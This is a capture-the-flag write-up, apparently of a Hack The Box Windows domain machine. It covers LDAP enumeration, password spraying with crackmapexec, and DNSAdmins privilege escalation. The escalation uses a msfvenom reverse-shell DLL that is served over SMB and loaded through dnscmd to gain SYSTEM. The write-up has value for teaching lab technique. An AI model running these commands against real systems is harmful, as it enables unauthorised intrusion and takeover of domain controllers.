Summary
Enumerating the LDAP service provides us with a list of users with enum4linux
When reviewing the LDAP information there was a password in a users details
Using the plain text password you can spray it across all accounts for access as user Melani
While enumerating we find credentials for Ryan in the powershell transcripts
Ryan has DNS Admin permissions and we inject a weaponized .dll into the DNS service which is run upon startup
With control over the dll we can remotely execute code as SYSTEM since the DNS service runs as SYSTEM
Tools/Blogs used
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise
msfvenom
smbserver
crackmapexec
windapshearch
enum4linux
Lessons learned
I missed a plaintext password while "skimming" the enum4linux report
Went down a long rabbit hole as user Ryan, exploring many possibilities
Not calling my smbserver properly, with the desired directory switch cost me allot of time wasted back tracking
Recon - Portscan
Starting with a basic nmap scan we receive a wide scope of open ports that will require allot of upfront time enumerating.
User account list
Using the enum4linux tool, we were able to enumerate smb shares, rpc ports and the LDAP service to acquire a list of usernames. We also found by initially overlooked the plain text password by use Marko, which had been logged in the LDAP attribute field.
LDAP enumeration
I made a mistake here, and completely missed a plantext password while scanning the report results of enum4linux, a common port enumeration tool.
Alternatively I learned about a new ldap enumeration tool. Historically I had used ldapsearch.py. This was an epic find for not only myself, but anyone who had previously utilized ldapsearch to send custom queries. ldapsearch.py has automated this process to find matching query syntax.
Windapsearch
Windapsearch is a Python script to help enumerate users, groups and computers from a Windows domain through LDAP queries. By default, Windows Domain Controllers support basic LDAP operations through port 389/tcp. With any valid domain account (regardless of privileges), it is possible to perform LDAP queries against a domain controller for any AD related information.
You can always use a tool like ldapsearch to perform custom LDAP queries against a Domain Controller. I found myself running different LDAP commands over and over again, and it was difficult to memorize all the custom LDAP queries. So this tool was born to help automate some of the most useful LDAP queries a pentester would want to perform in an AD environment.
Password Spraying
A users.txt file was created from the enum4linux report and utilized with crackmapexec. A tool that allows for co-operation of brute forcing via many requests. Alternatively you could use command line bash fu to make repeated attempts with any command line tool. But the command in this case was used below.
crackmapexec smb 10.10.10.169 -u users.txt -p Welcome123!
This gave us a successful connection with use Melanie.
User flag
Logging in as Melanie provided us access to the flag found in the normal location.
Lateral movement
From here I proceeded to upload winpeas and sherlock to enumerate for vulnerabilities. However, after going down many rabbit holes I reviews the Official Hack the Box forumn for a nudge and it was suggested to look for what is hidden. From here I quickly found the PSTranscripts logs.
Digging into the transcription logs I made sure to read thoroughly every line of our output and eventually located a plaintext password associated with user Ryan. The transcript logs were located in the C: directory.
I immediately logged in as Ryan with Evil WinRM.
Privilege escalation
As use Ryan I initially performed a large amount of enumeration using the usual enumeration scripts. Eventually my team and I decided to dig in on the user groups. Although this was a pretty wide surface area we were able to confirm that an attack against the DNS server was possible. Of course there are many assumed environment variables, but initially nothing suggested we could not go down this route. My team mate had actually ingested enough logs to map out the dns admin risk and this provided greater assurance we were on the correct track.
DNS DLL Injection
The exploit here involves utilizing DNS admin permissions to call and load a DNS config dll file that is intended to be run at start up. We simply create and weaponize the DLL with msfvenom and serve it up on a SMB server from which we call and inject this DLL into our Domain servers DNS config. Restarting the service executes our custom crafted DLL and gives us a shell
We start by creating a payload in the .dll format with a call back to our host with the use of msfvenom and the below commands.
msfvenom -p windows/x64/shell_reverse_tcp LHOST="My IP address" LPORT="my port" -f dll -o pwn.dll
From here we need to call the dll file and although we could use Invoke webrequest, curl or wget we will utilize the dnscmd to import the dll. However we first have to spin up an SMB server with the following command.
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py test .
With this in place we now can call and import the .dll with the dnscmd.exe command.
dnscmd.exe /config /serverlevelplugindll \\10.10.14.65\test\rev.dll
With a listener already setup we start and stop the dns serve with sc start dns and sc stop dns.
We see a call back to our SMB server and we receive a shell as NT system on our listener
Root.txt
With our reverse connection as NT system we cap our flag and call it a day :)
Comments